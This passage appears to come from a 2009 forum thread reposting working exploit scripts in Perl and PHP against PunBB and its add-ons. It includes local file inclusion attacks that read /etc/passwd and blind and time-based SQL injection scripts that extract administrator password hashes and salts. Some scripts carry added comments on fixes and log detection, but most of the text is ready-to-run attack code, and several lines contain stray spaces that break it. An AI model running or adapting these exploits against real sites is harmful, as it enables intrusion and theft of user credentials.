                fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write)));
                echo "[+] File $rand Saved Successfully!\r\n";
                echo "[+] Exploit Terminated!\r\n";
                exit;
            }
            else
            {
                echo $this->http_request($host[0],$write);
                exit;
            }
        }
    }
}
#!/usr/bin/perl
=about
PunBB (PunPortal 0.1) Local File Inclusion Exploit
--------------------------------------------------
by athos - staker[at]hotmail[dot]it
download mod http://www.punres.org/download.php?id=1108
download cms http://punbb.org
register globals = 1
magic quotes gcp = 1
File (include/login.php)
1. <?php
2.
3. // Show login if not logged in
4. if($pun_user['is_guest'])
5. {
6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element)))
7. {
8.
9. // Load the language files
10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';
11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';
$pun_user['is_guest'] isn't declared
$pun_user['language'] isn't declared
include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00
how to fix? Use the latest version (2.0)
Usage: perl punbb.pl localhost/cms
=cut
use strict;
use warnings;
use IO::Socket;
my $html = undef;
my $site = $ARGV[0] or &help;
my @take = split /\//,$site;
my ($host,$path) = @take;
if($site =~ /http:\/\/(.+?)/i) {
print STDOUT "Invalid URL\n";
exit;
}
print STDOUT "Local File (ex: ../../etc/passwd)\n";
print STDOUT "Local File: ";
chomp(my $file = <STDIN>);
if(not defined($file)) {
print STDOUT "File Not Defined!\n";
exit;
}
my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=";
my $sock = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
Timeout => 6,
) or die $!;
my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
"Accept-Language: en-us,en;q=0.5\r\n".
"Accept-Encoding: gzip,deflate\r\n".
"Connection: close\r\n\r\n";
$sock->send($data);
while(<$sock>) {
$html .= $_;
}
if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) {
print STDOUT "Exploit Failed!\n";
exit;
}
else {
my $name = int(rand(999)).'.txt';
open(FILE,">",$name);
print FILE $html;
close(FILE);
print STDOUT "Exploit Successfully!\n";
print STDOUT "$name saved!\n";
exit;
}
# Print the banner and usage line, then exit; invoked when no argument is given.
sub help {
    print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n".
    "by athos - staker[at]hotmail[dot]it\n".
    "Usage: perl $0 [host/path]\n";
    exit;
}
http://www.milw0rm.com/exploits/7168 (с)
Solide Snake
28.07.2009, 23:07
PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
#!/usr/bin/perl
#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;
my ($UserName,$PassWord,$ID) = @ARGV;
if(@ARGV < 3){
&usage();
exit();
}
my $Message = "";
my ($Hash,$Time,$Time_Start,$Time_End,$Response);
my($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,10 2);
my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(POST => $Host);
my $Cookies = new HTTP::Cookies;
my $HTTP = new LWP::UserAgent(
agent => 'Mozilla/5.0',
max_redirect => 0,
cookie_jar => $Cookies,
) or die $!;
my $Referrer = "form_sent=1&pid=10174&poster=Dante90, WaRWolFz Crew&method=1&req_message=http://www.warwolfz.com/&submit=Invia";
my $DefaultTime = request($Referrer);
# POST the login form with the credentials from @ARGV; the session cookie lands
# in the shared $Cookies jar. Returns 1 when the reply contains
# "Logged in successfully.", 0 otherwise; dies if the request itself fails.
sub Login(){
    my $Login = $HTTP->post($Host.'login.php?action=in',
    [
        form_sent => '1',
        redirect_url => 'forums.php',
        req_username => $UserName,
        req_password => $PassWord,
        login => 'Login',
    ]) || die $!;
    if($Login->content =~ /Logged in successfully./i){
        return 1;
    }else{
        return 0;
    }
}
if (Login() == 1){
$Message = " * Logged in as: ".$UserName;
}elsif (Login() == 0){
$Message = " * Login Failed.";
refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
print " * Exploit Failed *\n";
print " ------------------------------------------------------ \n";
exit;
}
# Build the `poster` value for one boolean-blind probe: it closes the string,
# ORs in an ASCII(SUBSTRING(password,$dec,1))=$hex test against users.id=$ID,
# and opens a comment to swallow the rest of the statement. The server-side
# root cause is string-concatenated SQL; parameterised queries (or escaping
# every parameter) remove the whole class. Detection: quote/OR/comment
# sequences in the reputation.php `poster` parameter, and bursts of up to
# 16 requests per hash position (see the loop below).
sub Blind_SQL_Jnjection{
    my ($dec,$hex) = @_;
    return "Dante90, WaRWolFz Crew\" OR ASCII(SUBSTRING((SELECT `password` FROM `users` WHERE `id`=${ID}),${dec},1))=${hex}/*";
}
for(my $I=1; $I<=40; $I++){ #N Hash characters
for(my $J=0; $J<=15; $J++){ #0 -> F
my $Post = $HTTP->post($Host.'reputation.php?',[
form_sent => '1',
pid => '2',
poster => Blind_SQL_Jnjection($I,$chars[$J]),
method => '1',
req_message => 'http://www.warwolfz.com/',
submit => 'Submit',
]) || die $!;
$Time = request($Referrer);
refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
if($Post->content =~ /(The reputation has been successfully changed)/i){
syswrite(STDOUT,chr($chars[$J]));
$Hash .= chr($chars[$J]);
$Time = request($Referrer);
refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
last;
}
}
if($I == 1 && length $Hash < 1 && !$Hash){
print " * Exploit Failed *\n";
print " ------------------------------------------------------ \n";
exit;
}
if($I == 40){
print " * Exploit Successed *\n";
print " ------------------------------------------------------\n ";
system("pause");
}
}
# Clear the (Windows) console and print the banner and usage; always exits.
sub usage{
    system("cls");
    {
        print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE: *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
        print " * perl name_exploit.pl [username] [password] [id] *\n";
        print " ------------------------------------------------------ \n";
        print " * Powered By Dante90, WaRWolFz Crew *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------ \n";
    };
    exit;
}
# Time one urlencoded POST of $_[0] to $Host with the shared $Method object.
# Dies if the response is not a success; returns the elapsed wall-clock seconds.
# Writes the package globals $Referrer, $Start, $End and $Time as side effects.
sub request{
    $Referrer = $_[0];
    $Method->content_type('application/x-www-form-urlencoded');
    $Method->content($Referrer);
    $Start = Time::HiRes::time();
    $Response = $HTTP->request($Method);
    $Response->is_success() or die "$Host : ", $Response->message,"\n";
    $End = Time::HiRes::time();
    $Time = $End - $Start;
    return $Time;
}
# Redraw the status screen: banner, then the positional arguments in the order
# message, host, default time (s), index into @chars of the character being
# tried, hash recovered so far, last SQL request time (s), hash position.
sub refresh{
    system("cls");
    {
        print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE: *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
        print " * perl name_exploit.pl [username] [password] [id] *\n";
        print " ------------------------------------------------------ \n";
        print " * Powered By Dante90, WaRWolFz Crew *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------ \n";
    };
    print $_[0] ."\n";
    print " * Victime Site: " . $_[1] . "\n";
    print " * Default Time: " . $_[2] . " seconds\n";
    print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";
    print " * BruteForcing N Char Hash: " . $_[6] . "\n";
    print " * SQL Time: " . $_[5] . " seconds\n";
    print " * Hash: " . $_[4] . "\n";
}
#WaRWolFz Crew
# milw0rm.com [2009-07-28]
Solide Snake
31.07.2009, 10:25
PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
#!/usr/bin/perl
#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
#register_globals = On
#magic_quotes_gpc = On
use LWP::UserAgent;
use HTTP::Cookies;
use strict;
# Script-level configuration. Every value is hard-coded rather than read from
# the command line (the usage() text further down lists no arguments).
my $EtcPasswd; # filled with the response body when the request is judged successful
my $TransversalDirectory = "./../../../../"; # "../" traversal prefix ("Transversal" is a misspelling of traversal)
my $LFI = "etc/passwd"; # path appended after the traversal prefix
my $HostName = "http://www.victime_site.org/path/"; # base URL of the target installation (placeholder value)
my $Referrer = "http://www.warwolfz.com/"; # assigned but never used in the visible script
my $Cookies = new HTTP::Cookies; # indirect-object syntax; HTTP::Cookies->new is the usual spelling
# Single LWP client. max_redirect => 0 means a 3xx answer is returned as-is
# rather than followed. The "or die $!" only fires if the constructor returns
# a false value, and $! would not carry a meaningful error in that case.
my $UserAgent = new LWP::UserAgent(
agent => 'Mozilla/5.0',
max_redirect => 0,
cookie_jar => $Cookies,
) or die $!;
# Build the request path for the mod's rep_profile.php.
# $Directory is the traversal prefix and $Command is a file path (not a
# command, despite the name); both are concatenated into the
# pun_user[language] query parameter and terminated with a URL-encoded NUL.
#
# Defender's reading: the header comment states register_globals = On as a
# precondition, i.e. the script presumably lets a request parameter populate
# the per-user language setting, which is then used in a file include without
# being checked against the installed languages. The trailing %00 relies on
# the old PHP behaviour of truncating a file name at a NUL byte.
# Validating the language against a fixed list of installed names (or
# rejecting any value containing "/", ".." or a NUL), and running with
# register_globals off, closes this path. In web-server logs, a request
# carrying "pun_user[language]=" together with traversal sequences or %00 is
# an unambiguous indicator.
sub Local_File_Inclusion{
my ($Directory,$Command) = @_;
return "./include/reputation/rep_profile.php?pun_user[language]=${Directory}${Command}%00";
}
# Fetch the crafted URL and judge success solely by the absence of PHP's own
# "No such file or directory in" warning text in the response body.
# Two consequences of that heuristic are worth noting for defenders: a server
# that does not display errors is reported as a success whatever it returned,
# and a server that *does* return that string is leaking its filesystem layout
# to every visitor, independently of this bug (display_errors should be off
# in production).
# NOTE: "$TransversalDir ectory" on the next line contains a stray space in
# this copy of the script; under "use strict" the line does not compile as
# written.
my $Get = $UserAgent->get($HostName.Local_File_Inclusion($TransversalDir ectory,$LFI));
if ($Get->content =~ /No such file or directory in/i){
# The status text becomes refresh()'s second argument, which that sub prints
# under an "Etc/Passwd" label.
refresh($HostName, "Exploit Filed");
print " * Error extracting sensible data.\n";
print " * Exploit Failed *\n";
print " ------------------------------------------------------ \n\n";
}else{
# Save the whole response body (not only the included file) into the current
# directory, silently overwriting any existing WaRWolFz.html.
$EtcPasswd = $Get->content;
open ( FILE , ">WaRWolFz.html" ) or die $!;
print FILE $EtcPasswd;
close ( FILE );
refresh($HostName, "File Saved");
print " * Exploit Successed *\n";
print " ------------------------------------------------------\n\n";
# Windows-only: keeps the console window open until a key is pressed.
system("pause");
}
sub usage{
	# Clear the console, print the help banner and stop the script.
	# "cls" is the Windows clear-screen command; this tool assumes a Windows
	# console throughout (see the "cd [Local Disk]:" hint).
	system("cls");
	my @banner = (
		" \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n",
		" ------------------------------------------------------ \n",
		" * USAGE: *\n",
		" * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n",
		" * perl name_exploit.pl *\n",
		" ------------------------------------------------------ \n",
		" * Powered By Dante90, WaRWolFz Crew *\n",
		" * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n",
		" ------------------------------------------------------ \n",
	);
	print @banner;
	exit;
}
sub refresh{
	# Clear the console, reprint the banner, then show the target and a status
	# string. The second value is printed under an "Etc/Passwd" label even
	# though the callers in this script pass a status message there.
	my ($site, $status) = @_;
	system("cls");
	my @banner = (
		" \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n",
		" ------------------------------------------------------ \n",
		" * USAGE: *\n",
		" * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n",
		" * perl name_exploit.pl *\n",
		" ------------------------------------------------------ \n",
		" * Powered By Dante90, WaRWolFz Crew *\n",
		" * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n",
		" ------------------------------------------------------ \n",
	);
	print @banner;
	print " * Victime Site: $site\n";
	print " * Etc/Passwd: $status\n";
}
#WaRWolFz
# milw0rm.com [2009-07-30]
[underwater]
13.11.2009, 15:16
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
f (isset($_GET['secure_str']))
{
if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))
{
...
'WHERE' => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1)
Злоупотребление preg_match:(
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PunBB"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
/*
 * Defender's reading of this script.
 * It targets the attachment extension's misc.php, which (per the snippet
 * quoted above this script) checks secure_str with the unanchored pattern
 * ~(\d+)f(\d+)~ and then concatenates an id straight into a WHERE clause. A
 * value that merely *starts* with "1f1" passes the check, so whatever follows
 * reaches the query. The script uses MySQL BENCHMARK() so that a correct
 * guess takes measurably longer (time-based blind injection) and reads the
 * password and salt of the first user with group_id=1 (presumably the
 * administrator group) one character at a time.
 * Application-side fix: anchor the pattern (~^(\d+)f(\d+)$~), use only the
 * captured integers, and bind them as parameters instead of concatenating.
 * Detection: requests to misc.php whose secure_str contains a quote,
 * BENCHMARK or SUBSTRING, and long runs of near-identical requests with
 * occasional multi-second responses.
 */
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to punbb
Example:
php '.$argv[0].' localhost /punbb/
+---------------------------------------------------------------------------+
');
exit;
}
// Report only E_ERROR|E_WARNING|E_PARSE (1|2|4 = 7).
error_reporting(7);
// Lift the CLI execution limit: every recovered character costs several
// seconds of induced delay.
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
// Table prefix is assumed, not discovered; a non-default prefix makes every
// guess miss.
$pre = 'pun_';
// Iteration count handed to BENCHMARK(); the delay it causes must exceed
// $timeout seconds for a guess to be counted as a hit.
$benchmark = 200000000;
$timeout = 10;
echo "Plz Waiting...\nPassword:\n";
/**
 * get pass
 */
// Recover the 40-character password column (a length consistent with a hex
// SHA-1 digest), trying only NUL, digits and lowercase letters. $j is the
// 1-based SUBSTRING() position.
$j = 1;
$pass = '';
$hash[0] = 0; //null
$hash = array_merge($hash, range(48, 57)); //numbers
$hash = array_merge($hash, range(97, 122)); //az letters
while (strlen($pass) < 40) {
for ($i = 0; $i <= 255; $i ++) {
if (in_array($i, $hash)) {
// Payload: "1f1'" satisfies the unanchored regex, the quote closes the id
// literal, and BENCHMARK() stalls the query only when the guessed byte
// matches. (This copy of the line carries stray spaces inside several
// tokens; they are transcription artefacts of the forum post.)
$cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20pas sword%20FROM%20'.$pre.'users%20WHERE%20group_id=1% 20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$bench mark.',CHAR(0)),1))%23';
// Two requests per guess: the first is apparently a warm-up, the second is
// timed with time()'s one-second resolution, which is why $timeout is as
// coarse as 10 s.
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$pass .= chr($i);
echo chr($i);
break;
}
}
// NOTE(review): an exhausted for-loop leaves $i at 256, so this guard only
// fires after a break at $i == 255 (not a candidate); with no match the outer
// while never terminates.
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ++;
}
echo "\nSalt:\n";
/**
 * get salt
 */
// Same procedure for the 12-character salt column. $hash is not reset: the
// earlier alphabet is kept and 33..126 is appended (duplicates do not affect
// in_array()).
$j = 1;
$salt = '';
$hash[0] = 0; //null
$hash = array_merge($hash, range(33, 126));
while (strlen($salt) < 12) {
for ($i = 0; $i <= 255; $i ++) {
if (in_array($i, $hash)) {
// Same payload shape as above, selecting the salt column (stray spaces are
// transcription artefacts again).
$cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20sal t%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LI MIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark .',CHAR(0)),1))%23';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$salt .= chr($i);
echo chr($i);
break;
}
}
// NOTE(review): same unreachable-guard issue as in the password loop.
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ++;
}
exit("\nExpoilt Success!\nPassword Hash:\t$pass\nSalt:\t$salt\n");
/**
 * Issue one GET to misc.php with the current payload and return the raw
 * response (status line, headers and body, undecoded).
 *
 * Reads the globals $host, $path and $cmd; $cmd is spliced into the URL
 * as-is, so it must already be URL-encoded. The callers in this script
 * discard the return value and only time the call.
 * Weak points visible here: the fsockopen() result is not checked, so a
 * failed connection hands a false handle to fputs() and the $fp guard merely
 * skips the read loop; no explicit timeout is set on the socket; the port is
 * fixed at 80 (no TLS); and the socket is never fclose()d, it is released
 * only when $fp goes out of scope. "Connection: Close" is what makes the
 * server end the stream and lets the feof() loop terminate.
 */
function send()
{
global $host, $path, $cmd;
$data = "GET ".$path."misc.php?item=1&secure_str=".$cmd." HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Connection: Close\r\n\r\n";
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>